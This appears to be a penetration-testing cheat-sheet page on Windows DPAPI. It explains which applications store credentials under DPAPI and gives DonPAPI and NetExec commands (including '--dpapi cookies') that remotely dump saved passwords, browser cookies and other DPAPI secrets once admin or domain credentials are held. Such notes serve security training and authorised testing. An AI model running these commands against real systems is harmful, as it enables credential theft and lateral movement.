DPAPI

Require Local admin privileges or DA privs

The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for:

Applications Use of DPAPI

Applications	Use of DPAPI
`Internet Explorer`	Password form auto-completion data (username and password for saved sites).
`Google Chrome`	Password form auto-completion data (username and password for saved sites).
`Outlook`	Passwords for email accounts.
`Remote Desktop Connection`	Saved credentials for connections to remote machines.
`Credential Manager`	Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

Internet Explorer

Password form auto-completion data (username and password for saved sites).

Google Chrome

Password form auto-completion data (username and password for saved sites).

Outlook

Passwords for email accounts.

Remote Desktop Connection

Saved credentials for connections to remote machines.

Credential Manager

Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

Tools

dploot

Donpapi

exegol-CPTS /workspace # DonPAPI "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"

Netexec - CME

NetExec - CME

nxc smb <ip> -u user -p password --dpapi

nxc smb <ip> -u user -p password --dpapi cookies

nxc smb <ip> -u user -p password --dpapi nosystem

Dump DPAPI | NetExec

PreviousDCSync NextBypass Powershell Execution Policy

Last updated 4 months ago